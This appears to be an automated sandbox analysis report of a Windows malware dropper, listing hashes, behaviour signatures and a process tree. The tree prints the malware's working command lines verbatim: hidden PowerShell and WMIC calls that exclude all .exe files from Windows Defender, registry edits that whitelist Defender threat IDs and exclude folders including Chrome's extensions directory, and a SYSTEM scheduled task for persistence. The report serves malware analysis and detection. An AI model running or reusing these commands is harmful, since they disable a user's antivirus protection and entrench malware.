Analysis

  • max time kernel
    195s
  • max time network
    245s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64 arch:x86 image:win10-20240404-en locale:en-us os:windows10-1703-x64 system
  • submitted
    25/07/2024, 22:45

General

  • Target

    a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844.exe

  • Size

    7.3MB

  • MD5

    e3acea0543ee4583576a61f6568d3216

  • SHA1

    c547db3b84ddf664ae6219566b92d6e18430a201

  • SHA256

    a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844

  • SHA512

    49f9a2c5a3bff68d97a59cbdfa33188f6d354a19db980e851a3afb7a8f902e43a0ec334c2e2a586e32653765ad0b04789d7a94b6f5b3b702e0f307ab836ba927

  • SSDEEP

    196608:91ObnoYIi4Yoiz2JYjhXDL1OTDG2xhM9XBp0Hm6ieyHuEKK:3OboYFNzOY1qG2M3msvb

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell with the display window hidden.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar sensitive data.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 33 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844.exe
    "C:\Users\Admin\AppData\Local\Temp\a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4684
    • C:\Users\Admin\AppData\Local\Temp\7zS5DB0.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2452
      • C:\Users\Admin\AppData\Local\Temp\7zS6002.tmp\Install.exe
        .\Install.exe /YWdidoXJ "385132" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:208
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:444
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2760
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4908
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "brlRsAdJaeHYbaQPPR" /SC once /ST 22:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6002.tmp\Install.exe\" NQ /kPXXdidKb 385132 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1128
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 1032
          4⤵
          • Program crash
          PID:5116
  • C:\Users\Admin\AppData\Local\Temp\7zS6002.tmp\Install.exe
    C:\Users\Admin\AppData\Local\Temp\7zS6002.tmp\Install.exe NQ /kPXXdidKb 385132 /S
    1⤵
    • Executes dropped EXE
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:4372
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
      2⤵
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2228
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3988
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4880
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:512
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3864
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3480
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1888
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2128
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4708
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1940
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1732
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:976
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1572
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5084
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1300
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2804
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
        3⤵
          PID:5000
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1428
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
          3⤵
            PID:2112
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
            3⤵
              PID:1204
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3260
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
              3⤵
                PID:3116
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3020
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3244
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3192
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4128
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                3⤵
                  PID:4124
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4304
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3104
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2928
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CpQtmNKkksTvAkviLhR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CpQtmNKkksTvAkviLhR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHBoolplFmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHBoolplFmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OfCUcdUmBfXwC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OfCUcdUmBfXwC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QAWIpintGGMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QAWIpintGGMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cIeibrkhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cIeibrkhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GnOWEelXRQHUOVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GnOWEelXRQHUOVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User 
Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yUEvGNAcZIxQcBNL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yUEvGNAcZIxQcBNL\" /t REG_DWORD /d 0 /reg:64;"
                2⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5044
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3840
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:32
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4092
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2924
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2372
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3180
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:5020
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1160
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3264
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4924
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4352
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2952
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GnOWEelXRQHUOVVB /t REG_DWORD /d 0 /reg:32
                  3⤵
                    PID:2000
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GnOWEelXRQHUOVVB /t REG_DWORD /d 0 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4932
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1464
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4500
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI /t REG_DWORD /d 0 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2760
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI /t REG_DWORD /d 0 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1168
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yUEvGNAcZIxQcBNL /t REG_DWORD /d 0 /reg:32
                    3⤵
                      PID:196
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yUEvGNAcZIxQcBNL /t REG_DWORD /d 0 /reg:64
                      3⤵
